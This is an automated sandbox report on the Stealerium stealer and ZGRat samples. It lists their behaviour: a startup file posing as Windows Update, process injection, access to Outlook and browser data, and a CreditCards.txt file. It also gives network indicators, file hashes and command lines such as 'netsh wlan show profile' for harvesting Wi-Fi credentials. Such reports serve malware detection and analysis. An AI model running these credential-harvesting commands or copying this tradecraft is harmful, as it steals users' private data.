N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealerium

stealer stealerium

ZGRat

rat zgrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2600 set thread context of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 3764 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe
PID 3764 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe
PID 3764 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 3764 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 3764 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 4924 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 5020 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5020 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5020 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5020 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5020 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5020 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5020 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 5020 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 5020 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4924 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1144 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1144 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 40.126.32.133:443 tcp
US 8.8.8.8:53 udp
SE 192.229.221.95:80 tcp
US 8.8.8.8:53 udp
US 138.91.171.81:80 tcp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 208.95.112.1:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 149.154.167.220:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 162.159.135.233:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.167.249.196:443 tcp
SE 192.229.221.95:80 tcp
N/A 40.126.32.133:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 152.199.19.74:80 tcp
N/A 52.140.118.28:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
N/A 52.140.118.28:443 tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
N/A 51.178.66.33:443 tcp
US 8.8.8.8:53 udp
N/A 136.175.8.205:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 13.95.31.18:443 tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
N/A 104.77.160.23:80 tcp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
N/A 162.159.135.233:443 tcp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 udp
GB 96.17.179.34:80 tcp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.111.229.48:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 192.98.74.40.in-addr.arpa udp

Files

memory/2600-1-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/2600-0-0x0000000000C50000-0x0000000000C5E000-memory.dmp

memory/2600-2-0x00000000056C0000-0x00000000056D0000-memory.dmp

memory/2600-3-0x0000000007200000-0x0000000007768000-memory.dmp

memory/2600-7-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-9-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-11-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-15-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-17-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-19-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-23-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-21-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-27-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-29-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-31-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-33-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-35-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-39-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-41-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-45-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-47-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-51-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-53-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-57-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-55-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-61-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-65-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-63-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-67-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-59-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-49-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-43-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-37-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-25-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-13-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-5-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-4-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-936-0x0000000002F70000-0x0000000002F71000-memory.dmp

memory/2600-937-0x0000000008E30000-0x0000000009330000-memory.dmp

memory/2600-938-0x0000000006FD0000-0x000000000701C000-memory.dmp

memory/2600-939-0x0000000008190000-0x0000000008734000-memory.dmp

memory/2600-943-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/3764-945-0x0000000000400000-0x0000000000C0A000-memory.dmp

memory/3764-944-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/3764-947-0x0000000005260000-0x0000000005270000-memory.dmp

memory/3764-948-0x00000000052B0000-0x00000000052BA000-memory.dmp

memory/3764-946-0x00000000050C0000-0x0000000005152000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xw.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 a90e4f6bdd44a71e2246160693884539
SHA1 940ebec474e0b4d87dc4f06f37a1d32d2315cf56
SHA256 b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4
SHA512 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937

memory/5112-978-0x0000015A3DAD0000-0x0000015A3DC48000-memory.dmp

memory/4924-977-0x00000000008A0000-0x0000000000A32000-memory.dmp

memory/5112-980-0x00007FFADC100000-0x00007FFADCBC1000-memory.dmp

memory/4924-982-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/5112-983-0x0000015A58300000-0x0000015A58310000-memory.dmp

memory/3764-981-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/4924-979-0x00000000052E0000-0x0000000005346000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 aeb20a62dc5daec0e2f60165f9829b07
SHA1 fdafa16dfbd0d2d6a1f88add8db1120721edead2
SHA256 08b11f91e2081d5ddf637d64784c4101ec65653d36299a7a22d9b457aae65a14
SHA512 388f9d76bf79d9c5e53a4c994ff9853356b6a0f2c5ef7feae84813f1be1d3a2c09e1838a3286acf980e66a270028595191cd35dd6593a920a8862b3cf10e387b

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 dcf0f2f524e0e1d2752f64dc7fce8ea0
SHA1 4cb2ae016e67f7fa88d9598313f6092fffc55559
SHA256 bf6796861138edc7e2eb7807fd388d91922408853c8dccb495aca889dd2e89b6
SHA512 fea9118e846801b82bb04c057624ab727c3f4116c7c194164da49f6541cfad65daa70e6a5c5dfc8f148e75ac5b96763b18dcf6a427c01fa4f8a7ab2b4aa51330

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/5112-985-0x0000015A5A390000-0x0000015A5A3E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 6e0741d4586628386a6f1df47a03655e
SHA1 610950a24bb3c8b318130ffb98690ecba89c1018
SHA256 65a5758d31c44e29e26a3444333ed585e13117daed14bff83e33df06ad9133f7
SHA512 4a3e09b6f5c6a33a9c919477b488aef6d3bf18e793fa3ff82dd105015b95ba0cd4451e52fbcf5ff5c9e37bc138856aaa5d83a18529512fdc4794eaff9a401393

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 45ea343e335d2d6400ccbc1e3fc85f11
SHA1 7f2267d1f27a076e284696c30a4cf4768fd1a52f
SHA256 f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203
SHA512 c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1

memory/4924-1018-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/5112-1027-0x00007FFADC100000-0x00007FFADCBC1000-memory.dmp

memory/4924-1031-0x00000000058A0000-0x00000000058C6000-memory.dmp

memory/4924-1032-0x00000000058D0000-0x00000000058D8000-memory.dmp

memory/4924-1030-0x0000000005810000-0x00000000058A2000-memory.dmp

memory/4924-1035-0x0000000006820000-0x000000000683E000-memory.dmp

memory/4924-1034-0x0000000006800000-0x0000000006808000-memory.dmp

memory/4924-1033-0x00000000067F0000-0x00000000067FA000-memory.dmp

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

memory/4924-1223-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/4924-1226-0x0000000006C40000-0x0000000006CBA000-memory.dmp

memory/4924-1298-0x0000000007100000-0x00000000071B2000-memory.dmp

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\Debug.txt

MD5 e08defb48fa31212026eba24f895a35f
SHA1 c0b9d3c1aec64bf21af878cab77d67999399437d
SHA256 e32ef5b1291cd83151ccce58e0a74f9fc287cbb4276670407972b1f79a2f561e
SHA512 6beb8c75d37b99674e28010cf6f1bc3862632cc299e1a297c0dfcd987771c5f1249d1818b5b0800b30b478fcf6e83392f75436ec186f3d1c73de67974958ff8d

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/4924-1300-0x0000000006B70000-0x0000000006B92000-memory.dmp

memory/4924-1301-0x0000000007FA0000-0x00000000082F4000-memory.dmp

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\msgid.dat

MD5 c010c7aa7b322c786d79b8846cb067ed
SHA1 fbd6564d70b404df38f7357fc5d1439cd44672a1
SHA256 9fb3307f61d84c4da05cc9e075a5512d168db16bad673994fc44ff8489b22f6e
SHA512 1197fc5a15271d40dc3732e9ffb3dc93e148d5714e18ac66c9af7da52b3005e4ea10b848215e566576f605bd72b43d3b5a8c0d2014396d0d493de40069bb873b

memory/4924-1313-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/4924-1314-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/4924-1315-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

0s

Max time network

94s

Command Line

C:\Windows\system32\OpenWith.exe -Embedding

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Avjteuhlk.dat

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
